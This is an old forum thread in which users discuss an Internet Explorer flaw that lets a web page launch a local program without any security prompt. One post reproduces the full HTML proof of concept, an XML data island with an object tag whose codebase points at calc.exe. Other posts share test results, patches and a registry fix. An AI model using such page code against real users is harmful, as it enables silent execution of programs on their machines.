Scary IE bug!!

LongCoolMother

Diamond Member
Sep 4, 2001
5,675
0
0
holy freak! what right does IE have to do that? i didnt get no script running alert or NOTHING. thatz freaky, if theres a script like that that can run anything through IE without your notice
 

gopunk

Lifer
Jul 7, 2001
29,239
2
0
is this bug supposed to do anything? all i see is some text telling me it's running calc.... but then it does nothing.

oh n/m, it was just the wrong path. that's tight.

code:



<< <html>
<head>
<title>Running "c:/winnt/system32/calc.exe"..</title>
<link rel="stylesheet" href="../sec.css">
</head>
<body>
Running "c:/winnt/system32/calc.exe"..
<span datasrc="#oExec" datafld="exploit" dataformatas="html"></span>
<xml id="oExec">
<security>
<exploit>
<![CDATA[
<object id="oFile" classid="clsid:11111111-1111-1111-1111-111111111111" codebase="c:/winnt/system32/calc.exe"></object>
]]>
</exploit>
</security>
</xml>
</body>
</html>
>>

 

CrackRabbit

Lifer
Mar 30, 2001
16,642
62
91
JOY! yet another way to infect our computers with viruses...


<< If only Microsoft would patch these damn things >>


if only....
 
Oct 16, 1999
10,490
4
0
The second page works even with Java & ActiveX disabled. The first page probably would too if I was running NT. This is sort of bad.

Ok, this is worse than bad, it added that ClassID to my registry. And this is with ALL scripting supposedly disabled.
 

cricky

Senior member
Nov 9, 1999
641
0
0
Well if you have your security settings done right, it should pop up an error saying you can't run ActiveX applications on this webpage...

It amazes me that people leave their computers so open to abuse...

--Christopher
 

gopunk

Lifer
Jul 7, 2001
29,239
2
0


<< The second page works even with Java & ActiveX disabled. The first page probably would too if I was running NT. This is sort of bad. >>



i find this really cool.... apparently it works for any app that hosts the WebBrowser control... so no active whatever is required. works for outlook express too!
 

shiner

Lifer
Jul 18, 2000
17,112
1
0
Yet another reason to NEVER do a default install of any MS OS.....doesn't work on mine cause XP isn't installed in WINNT on my system.
 

gopunk

Lifer
Jul 7, 2001
29,239
2
0


<< Yet another reason to NEVER do a default install of any MS OS.....doesn't work on mine cause XP isn't installed in WINNT on my system. >>



mine isn't either, but i did do a default install (or so i think)... i don't remember ever telling it not to use winnt.

can somebody explain the code to me? i'm guessing that the object tag attempts to access an object specified in the codebase attribute, but why is the classid all 1's?
 
Oct 16, 1999
10,490
4
0


<< Well if you have your security settings done right, it should pop up an error saying you can't run ActiveX applications on this webpage...

It amazes me that people leave their computers so open to abuse...

--Christopher
>>



Yes it should, now why the hell doesn't it? God knows I get that annoying pop up all the time, but at least I know it's blocking the crap. I got nothing here, and every aspect of ActiveX/Java/scripting that's accessible IS disabled. I just rechecked.
 

jpsj82

Senior member
Oct 30, 2000
958
0
0
now i think this is awsome. however i do also think it is a great security risk.
 

Argo

Lifer
Apr 8, 2000
10,045
0
0
Well, all it's doing is running a registered com server on your computer. That's equivalent to using an activex control. You can disable that by modifying your security settings. I don't think you can run any application like that -- only registered com servers.
 
Oct 16, 1999
10,490
4
0


<< Well, all it's doing is running a registered com server on your computer. That's equivalent to using an activex control. You can disable that by modifying your security settings. I don't think you can run any application like that -- only registered com servers. >>



Would you mind saying how to disable it then? Cuz if it's by simply changing the setting in Internet Options then that ain't working.
 

gopunk

Lifer
Jul 7, 2001
29,239
2
0


<<

<< Well, all it's doing is running a registered com server on your computer. That's equivalent to using an activex control. You can disable that by modifying your security settings. I don't think you can run any application like that -- only registered com servers. >>



Would you mind saying how to disable it then? Cuz if it's by simply changing the setting in Internet Options then that ain't working.
>>



well, greymagic has a registry fix
 

Eli

Super Moderator | Elite Member
Oct 9, 1999
50,419
8
81
I get the Active-X thing with the first one, but nothing happens with the 2nd one?
 

cricky

Senior member
Nov 9, 1999
641
0
0
<<Yes it should, now why the hell doesn't it? God knows I get that annoying pop up all the time, but at least I know it's blocking the crap. I got nothing here, and every aspect of ActiveX/Java/scripting that's accessible IS disabled. I just rechecked.>>

Dunno... Mine pops up a window saying "Your current security setting prohibt running any ActiveX controls on this page. As a result, this page may not display correctly." No notepad or calculator pops up, can't run any apps with the second one.

Running IE 6, all the most recent security patches downloaded, on a Win2k SP2 system...

Go get those security roll-up patches if you have not from Windows Update...

--Christopher